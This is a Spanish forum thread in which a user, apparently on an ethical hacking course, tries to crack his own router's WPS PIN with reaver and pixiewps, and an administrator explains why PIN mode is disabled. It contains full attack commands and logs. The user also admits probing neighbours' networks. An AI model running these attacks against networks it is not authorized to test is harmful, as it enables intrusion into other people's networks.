El libre pensamiento para un internet libre

No estas registrado.  

Anuncio

Wifi-highpower.es es distribuidor oficial de Alfa Network

#1 09-04-2019 14:20:58

uko
Usuario

Registrado: 09-04-2019
Mensajes: 2

Intentando crackear mi WPS

Buenas, antes de nada me presento, soy full-stack web developer y llevo tiempo trasteando con temas de ciberseguridad y hacking etico, ya que siempre es lo que realmente me ha llamado la atencion del sector tecnologico.
El caso que estoy siguiendo un curso de Hacking Etico, he llegado al apartado de vulnerabilidades wireless, probe con ataque de fuerza bruta con diccionario (cambie la password a la tipica 'password') y sin problemas, pero al tratar de sacar el pin WPS de mi wifi, me es imposible (he de decir que tambien he pecado de probar con redes de vecinos por si acaso era la mia la que estaba fallando), pero todas las demas me dan errores 02,03 o 04.
Otra pregunta que quiero hacer, como puedo ver mi PIN WPS para probar con el comando -p directamente? Me he conectado al router 192.168.1.1 pero no encuentro nada referente al PIN, solo me da la opcion de activar o descativar el WPS.
Uso kali live usb con persistence, y el adaptador red es un WN722N.
Os dejo un paste del terminal:

[email protected]:~# reaver -i wlan0mon -b MI_MAC_ADDRESS -vvv -K -d 15 -w -N -f

Reaver v1.6.5-git-19-gfeb454c WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>

[?] Restore previous session for MI_MAC_ADDRESS? [n/Y] n
[+] Waiting for beacon from MI_MAC_ADDRESS
[+] Received beacon from MI_MAC_ADDRESS
[+] Vendor: AtherosC
WPS: A new PIN configured (timeout=0)
WPS: UUID - hexdump(len=16): [NULL]
WPS: PIN - hexdump_ascii(len=8):
     31 32 33 34 35 36 37 30                           12345670        
WPS: Selected registrar information changed
WPS: Internal Registrar selected (pbc=0)
WPS: sel_reg_union
WPS: set_ie
WPS: cb_set_sel_reg
WPS: Enter wps_cg_set_sel_reg
WPS: Leave wps_cg_set_sel_reg early
WPS: return from wps_selected_registrar_changed
[+] Trying pin "12345670"
send_packet called from deauthenticate() 80211.c:337
send_packet called from authenticate() 80211.c:368
[+] Sending authentication request
send_packet called from associate() 80211.c:421
[+] Sending association request
[+] Associated with MI_MAC_ADDRESS (ESSID: vodafoneXXXX)
[+] Sending EAPOL START request
send_packet called from send_eapol_start() send.c:48
[+] Received identity request
[+] Sending identity response
send_packet called from send_identity_response() send.c:81
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
WPS: Processing received message (len=378 op_code=4)
WPS: Received WSC_MSG
WPS: Parsed WSC_MSG
WPS: Received M1
WPS: UUID-E - hexdump(len=16): 6d be 2d 6f 68 d0 58 2b b8 0c 63 dc 40 48 e6 05
WPS: Enrollee MAC Address MI_MAC_ADDRESS
WPS: Enrollee Nonce - hexdump(len=16): 1b 04 cf b8 ad aa 08 de b9 97 a5 fe b7 8f d3 b1
WPS: Enrollee Authentication Type flags 0x3f
WPS: No match in supported authentication types (own 0x0 Enrollee 0x3f)
WPS: Workaround - assume Enrollee does not advertise supported authentication types correctly
WPS: Enrollee Encryption Type flags 0xf
WPS: No match in supported encryption types (own 0x0 Enrollee 0xf)
WPS: Workaround - assume Enrollee does not advertise supported encryption types correctly
WPS: Enrollee Connection Type flags 0x1
WPS: Enrollee Config Methods 0x8 [Display]
WPS: Enrollee Wi-Fi Protected Setup State 2
WPS: Manufacturer - hexdump_ascii(len=7):
     54 50 2d 4c 49 4e 4b                              TP-LINK         
WPS: Model Name - hexdump_ascii(len=10):
     54 4c 2d 57 41 38 35 34 52 45                     TL-WA854RE      
WPS: Model Number - hexdump_ascii(len=4):
     32 2e 30 0d                                       2.0_            
WPS: Serial Number - hexdump_ascii(len=0):
WPS: Primary Device Type: 0-00000000-0
WPS: Device Name - hexdump_ascii(len=10):
     54 4c 2d 57 41 38 35 34 52 45                     TL-WA854RE      
WPS: Enrollee RF Bands 0x3
WPS: Enrollee Association State 0
WPS: Device Password ID 0
WPS: Enrollee Configuration Error 0
WPS: OS Version 80000000
WPS: M1 Processed
WPS: dev_pw_id checked
WPS: PBC Checked
WPS: Entering State SEND_M2
WPS: WPS_CONTINUE, Freeing Last Message
WPS: WPS_CONTINUE, Saving Last Message
WPS: returning
[+] Received M1 message
WPS: Found a wildcard PIN. Assigned it for this UUID-E
WPS: Registrar Nonce - hexdump(len=16): b2 6d 5a c6 5e be a0 18 39 69 9e ae 71 8a 8a f0
WPS: UUID-R - hexdump(len=16): 6f e3 d6 68 21 8e 7f 13 8e 8b 09 e4 29 11 bc 35
WPS: Building Message M2
WPS:  * Version
WPS:  * Message Type (5)
WPS:  * Enrollee Nonce
WPS:  * Registrar Nonce
WPS:  * UUID-R
WPS:  * Public Key
WPS: Generate new DH keys
DH: private value - hexdump(len=192): b9 a2 9c d5 3e 24 f9 8a 04 d5 dc 34 4d c8 28 fb 0c e5 3f 21 96 a1 33 ad 01 e4 5a 3a 74 ac 70 e9 11 60 16 d7 13 82 75 08 3b a7 4e 51 92 3f 12 52 f4 06 85 0c 99 fd e7 f6 65 38 13 11 09 b3 be b4 bf 68 4a 7e 58 ef ad 1d 5b 4b 76 70 24 cd 57 e7 d2 76 a3 1a 80 c9 5d 49 c5 b4 0c fd 80 ec 31 11 c8 2a ad 8a a0 f9 b0 f8 fa 57 ec bb 1c 9f e4 31 ff bb 55 2a ae e0 0f 4a 7f 6e 3a 67 64 4f d1 b2 08 f2 b7 54 e2 ca 3e 6a 92 4b 58 43 74 9f e0 ed 2f 3a 21 9f 15 0f 15 54 3f 6f 62 b0 53 34 5c 9d e6 fd f7 93 dd d4 03 7a 9f 92 df 76 99 40 f1 17 30 6a 6f fa 5b 0f 1c 9d 64 3e 82 5f 97 1a 43 c4
DH: public value - hexdump(len=192): be b8 f3 86 5b c2 24 cf c0 45 95 e7 9b 2c 05 7b 57 65 8a fd 53 6c 87 cb 9f 7b 36 ce 3a 70 99 1e f0 77 ff 1b cc 1d d4 c9 5c dd 28 2a 09 a6 d3 6d 62 e2 0f b9 83 de 37 71 0d 8e b4 45 f6 20 c4 d4 e9 cd 09 02 df ac 91 3b c4 00 82 45 59 30 89 26 93 c3 f0 0d 5e 85 22 e7 64 ca 3e 20 3a 20 9e f0 72 af 0b 6f 96 bc 8e 78 01 ef 4d 3a e5 58 6a 4d ed eb dd e0 3c 6a c0 8a cb 7a 59 67 18 0e 27 da 23 ac 36 ed 69 a3 ff 53 2c b5 2d 91 c9 11 98 d8 3e 1b 6a 0e 41 03 0c f9 70 d6 f7 3b 30 f7 70 67 48 55 9d cc 45 cc 07 95 68 58 ac fa 83 c8 b8 1a 74 9d d6 60 a7 2f 2a f4 0b 00 f5 f9 33 8f fd 03
WPS: DH Private Key - hexdump(len=192): b9 a2 9c d5 3e 24 f9 8a 04 d5 dc 34 4d c8 28 fb 0c e5 3f 21 96 a1 33 ad 01 e4 5a 3a 74 ac 70 e9 11 60 16 d7 13 82 75 08 3b a7 4e 51 92 3f 12 52 f4 06 85 0c 99 fd e7 f6 65 38 13 11 09 b3 be b4 bf 68 4a 7e 58 ef ad 1d 5b 4b 76 70 24 cd 57 e7 d2 76 a3 1a 80 c9 5d 49 c5 b4 0c fd 80 ec 31 11 c8 2a ad 8a a0 f9 b0 f8 fa 57 ec bb 1c 9f e4 31 ff bb 55 2a ae e0 0f 4a 7f 6e 3a 67 64 4f d1 b2 08 f2 b7 54 e2 ca 3e 6a 92 4b 58 43 74 9f e0 ed 2f 3a 21 9f 15 0f 15 54 3f 6f 62 b0 53 34 5c 9d e6 fd f7 93 dd d4 03 7a 9f 92 df 76 99 40 f1 17 30 6a 6f fa 5b 0f 1c 9d 64 3e 82 5f 97 1a 43 c4
WPS: DH own Public Key - hexdump(len=192): be b8 f3 86 5b c2 24 cf c0 45 95 e7 9b 2c 05 7b 57 65 8a fd 53 6c 87 cb 9f 7b 36 ce 3a 70 99 1e f0 77 ff 1b cc 1d d4 c9 5c dd 28 2a 09 a6 d3 6d 62 e2 0f b9 83 de 37 71 0d 8e b4 45 f6 20 c4 d4 e9 cd 09 02 df ac 91 3b c4 00 82 45 59 30 89 26 93 c3 f0 0d 5e 85 22 e7 64 ca 3e 20 3a 20 9e f0 72 af 0b 6f 96 bc 8e 78 01 ef 4d 3a e5 58 6a 4d ed eb dd e0 3c 6a c0 8a cb 7a 59 67 18 0e 27 da 23 ac 36 ed 69 a3 ff 53 2c b5 2d 91 c9 11 98 d8 3e 1b 6a 0e 41 03 0c f9 70 d6 f7 3b 30 f7 70 67 48 55 9d cc 45 cc 07 95 68 58 ac fa 83 c8 b8 1a 74 9d d6 60 a7 2f 2a f4 0b 00 f5 f9 33 8f fd 03
WPS: DH Private Key - hexdump(len=192): b9 a2 9c d5 3e 24 f9 8a 04 d5 dc 34 4d c8 28 fb 0c e5 3f 21 96 a1 33 ad 01 e4 5a 3a 74 ac 70 e9 11 60 16 d7 13 82 75 08 3b a7 4e 51 92 3f 12 52 f4 06 85 0c 99 fd e7 f6 65 38 13 11 09 b3 be b4 bf 68 4a 7e 58 ef ad 1d 5b 4b 76 70 24 cd 57 e7 d2 76 a3 1a 80 c9 5d 49 c5 b4 0c fd 80 ec 31 11 c8 2a ad 8a a0 f9 b0 f8 fa 57 ec bb 1c 9f e4 31 ff bb 55 2a ae e0 0f 4a 7f 6e 3a 67 64 4f d1 b2 08 f2 b7 54 e2 ca 3e 6a 92 4b 58 43 74 9f e0 ed 2f 3a 21 9f 15 0f 15 54 3f 6f 62 b0 53 34 5c 9d e6 fd f7 93 dd d4 03 7a 9f 92 df 76 99 40 f1 17 30 6a 6f fa 5b 0f 1c 9d 64 3e 82 5f 97 1a 43 c4
WPS: DH peer Public Key - hexdump(len=192): 07 88 e4 6c 4d 83 ad 81 7f a5 04 d1 7c 8a 9a 68 5d 4a c8 b5 9a 93 0b 59 22 55 03 2b 3a 12 20 b1 90 24 80 36 fb 64 9d bb 36 3d 43 99 a6 e4 40 9b 98 b2 f2 a3 5c da 48 a2 ec 94 07 5e 40 05 08 fc 11 19 79 e8 35 fc 91 e3 3d 52 d0 a1 f5 e3 05 ec 30 ab ee 24 63 f4 4f 66 d2 0e 76 0a 5d 46 26 7f eb 88 51 53 6f 4f 85 a7 5b af a4 29 ed d5 a0 9d da 79 55 a0 ef ce ce 42 11 f1 64 f9 b6 a1 f5 a7 7e a2 21 52 b0 d5 c4 1c e7 7d 97 0d 43 26 66 f7 2e 15 d2 91 49 a1 25 07 d6 c0 cb 81 39 a9 6f b6 39 10 c4 6b 15 0b 36 6a 6d ee e2 d7 7c 64 f1 c5 b5 07 73 f7 d1 69 ed 68 46 94 0d 99 4b 28 4a 19
DH: shared key - hexdump(len=192): 25 39 b0 50 09 f5 be 1f 8f 83 96 26 8d 4e 88 ad 64 93 fc 3d 6c 64 53 cd ef 4f 4c e7 6c 30 17 1b 20 86 39 56 0a 60 56 e5 e1 8a af 9b 0a 0e 02 ba aa 29 2e e4 e7 df 39 74 1b 58 ae e5 01 53 0b 4b 16 8c 84 d4 ba 63 78 d4 25 fe fd b1 86 30 d0 23 a6 fd 0d 41 14 f3 59 1a 0b 2d dc ed 61 7e c6 d6 cb 3d b8 f7 26 18 e7 cc 1f 00 7f f0 e8 4d 92 2b 66 6b 88 42 44 ed c8 e6 2e 84 9f 67 5c 01 8e bb cf ae 1c 84 f4 6c 2c 2c eb 08 5e d8 ec 85 71 b2 d8 b4 d7 bb 85 6a 0e 95 c2 98 c8 49 85 eb a6 16 b5 7c b5 d7 4e cb ed 2f e9 55 a0 da 52 e4 9f d7 69 a4 a2 9c 24 3c bf aa 26 0a c8 e4 53 40 63 e8
WPS: DH shared key - hexdump(len=192): 25 39 b0 50 09 f5 be 1f 8f 83 96 26 8d 4e 88 ad 64 93 fc 3d 6c 64 53 cd ef 4f 4c e7 6c 30 17 1b 20 86 39 56 0a 60 56 e5 e1 8a af 9b 0a 0e 02 ba aa 29 2e e4 e7 df 39 74 1b 58 ae e5 01 53 0b 4b 16 8c 84 d4 ba 63 78 d4 25 fe fd b1 86 30 d0 23 a6 fd 0d 41 14 f3 59 1a 0b 2d dc ed 61 7e c6 d6 cb 3d b8 f7 26 18 e7 cc 1f 00 7f f0 e8 4d 92 2b 66 6b 88 42 44 ed c8 e6 2e 84 9f 67 5c 01 8e bb cf ae 1c 84 f4 6c 2c 2c eb 08 5e d8 ec 85 71 b2 d8 b4 d7 bb 85 6a 0e 95 c2 98 c8 49 85 eb a6 16 b5 7c b5 d7 4e cb ed 2f e9 55 a0 da 52 e4 9f d7 69 a4 a2 9c 24 3c bf aa 26 0a c8 e4 53 40 63 e8
WPS: DHKey - hexdump(len=32): 85 8d 4b 30 d4 5f 18 e9 08 05 2b 7a 87 01 43 2a fc a9 66 2d c4 99 55 13 88 58 dd f0 52 6b 8e 25
WPS: KDK - hexdump(len=32): 7b ef 13 17 5f d9 ea 8f f2 0d 29 75 bd 90 82 ef 37 bb f2 e4 54 14 f3 d3 ff 06 5d 5e ce 2a a7 d7
WPS: AuthKey - hexdump(len=32): ff f5 0a ac 36 d4 33 60 1f 77 35 e0 72 0f b2 36 22 93 00 63 5d 1d d3 7f f7 b9 b5 72 db 6f 85 71
WPS: KeyWrapKey - hexdump(len=16): de 72 97 65 59 d8 dc 88 78 54 d3 07 8f b0 14 e3
WPS: EMSK - hexdump(len=32): f1 6e 69 2a 05 44 18 a2 b0 5b ba ef 04 ff be bb 92 dd 92 9a f4 2d f6 be b9 bc 4d dd c4 57 98 4e
WPS:  * Authentication Type Flags
WPS:  * Encryption Type Flags
WPS:  * Connection Type Flags
WPS:  * Config Methods (8c)
WPS:  * Manufacturer
WPS:  * Model Name
WPS:  * Model Number
WPS:  * Serial Number
WPS:  * Primary Device Type
WPS:  * Device Name
WPS:  * RF Bands (1)
WPS:  * Association State
WPS:  * Configuration Error (0)
WPS:  * Device Password ID (0)
WPS:  * OS Version
WPS:  * Authenticator
[+] Sending M2 message
send_packet called from send_msg() send.c:116
WPS: Processing received message (len=378 op_code=4)
WPS: Received WSC_MSG
WPS: Parsed WSC_MSG
WPS: Received M1
WPS: Unexpected state (15) for receiving M1
WPS: returning
[+] Received M1 message
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
WPS: Processing received message (len=114 op_code=4)
WPS: Received WSC_MSG
WPS: Parsed WSC_MSG
WPS: Received M3
WPS: E-Hash1 - hexdump(len=32): 55 d1 77 4e ca 09 e2 7e 0f 29 75 ca 7b 13 a6 6d b3 5b f7 ff 78 e6 cb 8e 33 65 1d 53 08 46 b4 dc
WPS: E-Hash2 - hexdump(len=32): f2 8e a3 29 31 cf 3f f3 a9 cb ac 36 5a 81 80 ae 29 31 e8 5f 27 38 1a f7 cd 55 dc 7b 9b b0 b4 a5
executing pixiewps -e 0788e46c4d83ad817fa504d17c8a9a685d4ac8b59a930b592255032b3a1220b190248036fb649dbb363d4399a6e4409b98b2f2a35cda48a2ec94075e400508fc111979e835fc91e33d52d0a1f5e305ec30abee2463f44f66d20e760a5d46267feb8851536f4f85a75bafa429edd5a09dda7955a0efcece4211f164f9b6a1f5a77ea22152b0d5c41ce77d970d432666f72e15d29149a12507d6c0cb8139a96fb63910c46b150b366a6deee2d77c64f1c5b50773f7d169ed6846940d994b284a19 -s 55d1774eca09e27e0f2975ca7b13a66db35bf7ff78e6cb8e33651d530846b4dc -z f28ea32931cf3ff3a9cbac365a8180ae2931e85f27381af7cd55dc7b9bb0b4a5 -a fff50aac36d433601f7735e0720fb236229300635d1dd37ff7b9b572db6f8571 -n 1b04cfb8adaa08deb997a5feb78fd3b1 -r beb8f3865bc224cfc04595e79b2c057b57658afd536c87cb9f7b36ce3a70991ef077ff1bcc1dd4c95cdd282a09a6d36d62e20fb983de37710d8eb445f620c4d4e9cd0902dfac913bc40082455930892693c3f00d5e8522e764ca3e203a209ef072af0b6f96bc8e7801ef4d3ae5586a4dedebdde03c6ac08acb7a5967180e27da23ac36ed69a3ff532cb52d91c91198d83e1b6a0e41030cf970d6f73b30f7706748559dcc45cc07956858acfa83c8b81a749dd660a72f2af40b00f5f9338ffd03

 Pixiewps 1.4

 [-] WPS pin not found!

 [] Time taken: 0 s 89 ms

Desconectado

Anuncio

Wifi-highpower.es es distribuidor oficial de Alfa Network

#2 09-04-2019 18:41:23

kcdtv
Administrator

Registrado: 14-11-2014
Mensajes: 4,811

Re: Intentando crackear mi WPS

Bienvenido al foro uko biere

(he de decir que tambien he pecado de probar con redes de vecinos por si acaso era la mia la que estaba fallando)

Mejor guardar para uno mismo este tipo de comentario... Además no aportan ninguna información útil. tongue 

Me he conectado al router 192.168.1.1 pero no encuentro nada referente al PIN, solo me da la opcion de activar o descativar el WPS.

Es la política actual: Vodafone, Orange, Telefonica... Las empresas proveedores de acceso deshabilitan el modo PIN y capan las interfaces para impedir su uso.
Solo se puede usar en modo PBC.
Hemos observado con wiire (y más gente big_smile ) que algunos routers con el modo PBC sueltan a veces un M3 y se hace un ataque pixie dust.
Pero los datos son basura y no se encuentra nigún PIN porque... No hay ningún PIN configurado.
Bien parece que es lo que te está pasando.
¿Cuál es tu modelo de router? Sería la primera cosa a decir para que podamos asesorarte (y si nos ensañaría un probe con la opción -j de wash, mejor aún wink )

Desconectado

#3 10-04-2019 16:29:43

uko
Usuario

Registrado: 09-04-2019
Mensajes: 2

Re: Intentando crackear mi WPS

Gracias kcdtv!

Lo tendre en cuenta roll

Me imaginaba algo asi, ya que todo lo documentado rondaba el 2015, y en 4 años han tenido tiempo de intentar solucionarlo, aunque viendo los ultimos commit de reaver-t6x aun habia esperanzas de intentar conseguirlo. Pero despues de varios dias en los que no he parado de leer por foros y hasta donde google me ha dejado llegar, las esperanzas de conseguirlo con esta vulnerabilidad, se van diluyendo. Ya que he probado todo lo que he ido viendo (a excepcion de wiire, con esto no he dado) y no ha habido mucha suerte.

El hilo que me has puesto de Pixie Dust ya me lo lei ayer y me entere mas/menos de como funcionaba el sistema.

Json del router:

{"bssid" : "xx:xx:xx:xx:xx", "essid" : "vodafone9EB4", "channel" : 11, "rssi" : -80, "vendor_oui" : "001018", "wps_version" : 32, "wps_state" : 2, "wps_locked" : 2, "wps_manufacturer" : "Broadcom", "wps_model_name" : "Broadcom", "wps_model_number" : "123456", "wps_device_name" : "TechnicolorAP", "wps_serial" : "0000001", "wps_uuid" : "b186d5fb84139ca4c855a0c2b8425e50", "wps_response_type" : "03", "wps_primary_device_type" : "00060050f2040001", "wps_config_methods" : "2008", "wps_rf_bands" : "03", "dummy": 0}

Json completo de wash, por si aporta información interesante que me pueda hacer aprender alguna vulnerabilidad concreta.

{"bssid" : "xx:xx:xx:xx:xx", "essid" : "MOVISTAR_2A5E", "channel" : 1, "rssi" : -72, "vendor_oui" : "001018", "wps_version" : 16, "wps_state" : 2, "wps_locked" : 1, "wps_manufacturer" : "Broadcom", "wps_model_name" : "Broadcom", "wps_model_number" : "123456", "wps_device_name" : "BroadcomAP", "wps_serial" : "1234", "wps_uuid" : "5f5e58a0dbb18fde9a7e17ba39bfb32a", "wps_response_type" : "03", "wps_primary_device_type" : "00060050f2040001", "wps_config_methods" : "0084", "wps_rf_bands" : "01", "dummy": 0}
{"bssid" : "xx:xx:xx:xx:xx", "essid" : "MiFibra-4ED7", "channel" : 1, "rssi" : -78, "vendor_oui" : "001018", "wps_version" : 32, "wps_state" : 2, "wps_locked" : 2, "wps_manufacturer" : "Arcadyan", "wps_model_name" : "Arcadyan", "wps_model_number" : "123456", "wps_device_name" : "PRV3399B_B_LT", "wps_serial" : "1234", "wps_uuid" : "6972de2cb41cbe2d59740c6db1437a67", "wps_response_type" : "03", "wps_primary_device_type" : "00060050f2040001", "wps_config_methods" : "200c", "wps_rf_bands" : "01", "dummy": 0}
{"bssid" : "xx:xx:xx:xx:xx", "essid" : "JAZZTEL_nqHt", "channel" : 6, "rssi" : -88, "vendor_oui" : "00037F", "wps_version" : 32, "wps_state" : 2, "wps_locked" : 2, "wps_manufacturer" : "ZTE", "wps_model_name" : "ZXHN F680", "wps_model_number" : "F680 V2.0", "wps_device_name" : "ZXHN F680 V2.0", "wps_serial" : "12345678", "wps_uuid" : "2aa18325308e5bba9f318d4c3789b140", "wps_response_type" : "03", "wps_primary_device_type" : "00060050f2040001", "wps_config_methods" : "0480", "wps_rf_bands" : "01", "dummy": 0}
{"bssid" : "xx:xx:xx:xx:xx", "essid" : "Orange-AF6E", "channel" : 6, "rssi" : -64, "vendor_oui" : "001018", "wps_version" : 32, "wps_state" : 2, "wps_locked" : 2, "wps_manufacturer" : "Livebox Corporation", "wps_model_name" : "VRV9510KWAC23", "wps_model_number" : "00.96.613S", "wps_device_name" : "Livebox Wireless Router(WFA)", "wps_serial" : "J615139529", "wps_uuid" : "00000000000000010003d463fea6af6f", "wps_response_type" : "03", "wps_primary_device_type" : "00060050f2040001", "wps_config_methods" : "268c", "wps_rf_bands" : "03", "dummy": 0}
{"bssid" : "xx:xx:xx:xx:xx", "essid" : "MOVISTAR_BCFB", "channel" : 6, "rssi" : -67, "vendor_oui" : "001018", "wps_version" : 32, "wps_state" : 2, "wps_locked" : 2, "wps_manufacturer" : "MitraStar", "wps_model_name" : "GPT-2541GNAC", "wps_model_number" : "123456", "wps_device_name" : "GPT-2541GNAC", "wps_serial" : "1234", "wps_uuid" : "446454a46d8e666146c6442f698dab5d", "wps_response_type" : "03", "wps_primary_device_type" : "00060050f2040001", "wps_config_methods" : "200c", "wps_rf_bands" : "03", "dummy": 0}
{"bssid" : "xx:xx:xx:xx:xx", "essid" : "MIWIFI_2G_Nuny", "channel" : 10, "rssi" : -85, "vendor_oui" : "001018", "wps_version" : 16, "wps_state" : 2, "wps_locked" : 2, "wps_manufacturer" : "ZTE", "wps_model_name" : "ZXHN F680", "wps_model_number" : "F680 V4.0", "wps_device_name" : "ZXHN F680 V4.0", "wps_serial" : "12345678", "wps_uuid" : "00000000000000000000000000000000", "wps_response_type" : "03", "wps_primary_device_type" : "00060050f2040001", "wps_config_methods" : "0080", "wps_rf_bands" : "01", "dummy": 0}
{"bssid" : "xx:xx:xx:xx:xx", "essid" : "vodafoneDC70", "channel" : 11, "rssi" : -86, "vendor_oui" : "001018", "wps_version" : 32, "wps_state" : 2, "wps_locked" : 2, "wps_manufacturer" : "Sagemcom", "wps_model_name" : "Sagemcom", "wps_model_number" : "123456", "wps_device_name" : "SagemcomAP", "wps_serial" : "0000001", "wps_uuid" : "4dfab2252dc6a6df6eac633b9eb9cfdb", "wps_response_type" : "03", "wps_primary_device_type" : "00060050f2040001", "wps_config_methods" : "2008", "wps_rf_bands" : "03", "dummy": 0}
{"bssid" : "xx:xx:xx:xx:xx", "essid" : "MOVISTAR_332B", "channel" : 11, "rssi" : -80, "vendor_oui" : "001018", "wps_version" : 16, "wps_state" : 2, "wps_locked" : 1, "wps_manufacturer" : "Broadcom", "wps_model_name" : "Broadcom", "wps_model_number" : "123456", "wps_device_name" : "BroadcomAP", "wps_serial" : "1234", "wps_uuid" : "0da1dd3f9f58d61ea7251c2916fc87df", "wps_response_type" : "03", "wps_primary_device_type" : "00060050f2040001", "wps_config_methods" : "0084", "wps_rf_bands" : "01", "dummy": 0}
{"bssid" : "xx:xx:xx:xx:xx", "essid" : "vodafoneBC50", "channel" : 6, "rssi" : -88, "vendor_oui" : "001018", "wps_version" : 32, "wps_state" : 2, "wps_locked" : 2, "wps_manufacturer" : "Broadcom", "wps_model_name" : "Broadcom", "wps_model_number" : "123456", "wps_device_name" : "TechnicolorAP", "wps_serial" : "0000001", "wps_uuid" : "28fa9469df2fbcf1a46ce82398b34804", "wps_response_type" : "03", "wps_primary_device_type" : "00060050f2040001", "wps_config_methods" : "2008", "wps_rf_bands" : "03", "dummy": 0}
{"bssid" : "xx:xx:xx:xx:xx", "essid" : "JAZZTEL_brtm", "channel" : 7, "rssi" : -84, "vendor_oui" : "00037F", "wps_version" : 32, "wps_state" : 2, "wps_locked" : 2, "wps_manufacturer" : "ZTE", "wps_model_name" : "ZXHN F680", "wps_model_number" : "F680 V2.0", "wps_device_name" : "ZXHN F680 V2.0", "wps_serial" : "12345678", "wps_uuid" : "25104987ef105267956306c65cc42d34", "wps_response_type" : "03", "wps_primary_device_type" : "00060050f2040001", "wps_config_methods" : "0480", "wps_rf_bands" : "01", "dummy": 0}
{"bssid" : "xx:xx:xx:xx:xx", "essid" : "vodafone23BF", "channel" : 8, "rssi" : -80, "vendor_oui" : "001018", "wps_version" : 32, "wps_state" : 2, "wps_locked" : 2, "wps_manufacturer" : "Broadcom", "wps_model_name" : "Broadcom", "wps_model_number" : "123456", "wps_device_name" : "BroadcomAP", "wps_serial" : "1234", "wps_uuid" : "e9f6d8578cafd59ab88cca546b540bb3", "wps_response_type" : "03", "wps_primary_device_type" : "00060050f2040001", "wps_config_methods" : "0000", "wps_rf_bands" : "01", "dummy": 0}
{"bssid" : "xx:xx:xx:xx:xx", "essid" : "asus", "channel" : 9, "rssi" : -86, "vendor_oui" : "001018", "wps_version" : 32, "wps_state" : 2, "wps_locked" : 1, "wps_manufacturer" : "ASUSTeK Computer Inc.", "wps_model_name" : "Wi-Fi Protected Setup Router", "wps_model_number" : "RT-AC68U", "wps_device_name" : "RT-AC68U", "wps_serial" : "b0:6e:bf:3e:6f:28", "wps_uuid" : "ea2b643829ff5832dc32ef21cc4d1d96", "wps_response_type" : "03", "wps_primary_device_type" : "00060050f2040001", "wps_config_methods" : "2008", "wps_rf_bands" : "03", "dummy": 0}
{"bssid" : "xx:xx:xx:xx:xx", "essid" : "MIWIFI_2G_3WHs", "channel" : 9, "rssi" : -87, "vendor_oui" : "001018", "wps_version" : 16, "wps_state" : 2, "wps_locked" : 2, "wps_manufacturer" : "ZTE", "wps_model_name" : "ZXHN F680", "wps_model_number" : "F680 V4.0", "wps_device_name" : "ZXHN F680 V4.0", "wps_serial" : "12345678", "wps_uuid" : "00000000000000000000000000000000", "wps_response_type" : "03", "wps_primary_device_type" : "00060050f2040001", "wps_config_methods" : "0080", "wps_rf_bands" : "01", "dummy": 0}
{"bssid" : "xx:xx:xx:xx:xx", "essid" : "MOVISTAR_580F", "channel" : 6, "rssi" : -86, "vendor_oui" : "00E04C", "wps_version" : 32, "wps_state" : 2, "wps_locked" : 2, "wps_manufacturer" : "MistraStar Corp.", "wps_model_name" : "RTL8xxx", "wps_model_number" : "EV-2010-09-20", "wps_device_name" : "HGW-500BNA-QCv2", "wps_serial" : "123456789012347", "wps_uuid" : "6304125310192006122884aa9ce75811", "wps_response_type" : "03", "wps_primary_device_type" : "00060050f2040001", "wps_config_methods" : "0000", "dummy": 0}
{"bssid" : "xx:xx:xx:xx:xx", "essid" : "vodafone1490", "channel" : 1, "rssi" : -73, "vendor_oui" : "001018", "wps_version" : 32, "wps_state" : 2, "wps_locked" : 2, "wps_manufacturer" : "Sagemcom", "wps_model_name" : "Sagemcom", "wps_model_number" : "123456", "wps_device_name" : "SagemcomAP", "wps_serial" : "0000001", "wps_uuid" : "154ff8e5114d10a60cc0d4d24bdb2e2d", "wps_response_type" : "03", "wps_primary_device_type" : "00060050f2040001", "wps_config_methods" : "2008", "wps_rf_bands" : "03", "dummy": 0}

EDIT: Perdona mi ignoracina, acabo de ver que Wiire es una persona, creadora del pixie imagino.

EDIT2: Al lanzar reaver directamente al router me hecha. Pero al amplificador es el que me devuelve la respuesta de mi primer post.

{"bssid" : "xx:xx:xx:xx:xx", "essid" : "vodafone9EB4", "channel" : 11, "rssi" : -75, "vendor_oui" : "00037F", "wps_version" : 16, "wps_state" : 2, "wps_locked" : 2, "wps_manufacturer" : "TP-LINK", "wps_model_name" : "TL-WA854RE", "wps_model_number" : "2.0\\x0d", "wps_device_name" : "TL-WA854RE", "wps_uuid" : "6dbe2d6f68d0582bb80c63dc4048e605", "wps_response_type" : "03", "wps_primary_device_type" : "0000000000000000", "wps_config_methods" : "0008", "wps_rf_bands" : "03", "dummy": 0}

Ultima edición por uko (10-04-2019 16:54:59)

Desconectado

#4 11-04-2019 16:06:56

kcdtv
Administrator

Registrado: 14-11-2014
Mensajes: 4,811

Re: Intentando crackear mi WPS

EDIT2: Al lanzar reaver directamente al router me hecha. Pero al amplificador es el que me devuelve la respuesta de mi primer post

Entonces hablamos de un Tp-Link TL-WA854RE.
No lo he probado pero leyendo el manual me parece que el WPS es para modo cliente (Enrolle). O sea para conectar el repetidor al router fuente.
A lo mejor estoy equivocado. En todos casos, si es posible usar lo en modo registar y que no puedes configurar un PIN, no hay forma de usar lo para tus pruebas wifi.
Si quieres hackearlo en modo intrusión local has pillado un modelo perfecto para aprender big_smile The (in)security of the TP-Link Technologies TL-WA850RE Wi-Fi Range Extender

Desconectado

Anuncio

Wifi-libre.com: El libre pensamiento para un internet libre / Regístrese ahora

Temas similares

Tema Respuestas Vistas Ultimo mensaje
3 72 Hoy 11:20:02 por USUARIONUEVO
Binwalk por manu33
0 7 Hoy 11:12:38 por manu33
35 1526 Ayer 22:07:09 por mind777
Router por manu33
2 75 Ayer 20:17:40 por manu33
19 437 Ayer 16:25:27 por Hunter310#

Pie de página

Información del usuario

Ultimo usuario registrado: manu33
Usuarios registrados conectados: 0
Invitados conectados: 10

Estadisticas de los foros

Número total de usuarios registrados: 1,467
Número total de temas: 1,307
Número total de mensajes: 13,289

Máx. usuarios conectados: 74 el 13-11-2018 18:47:20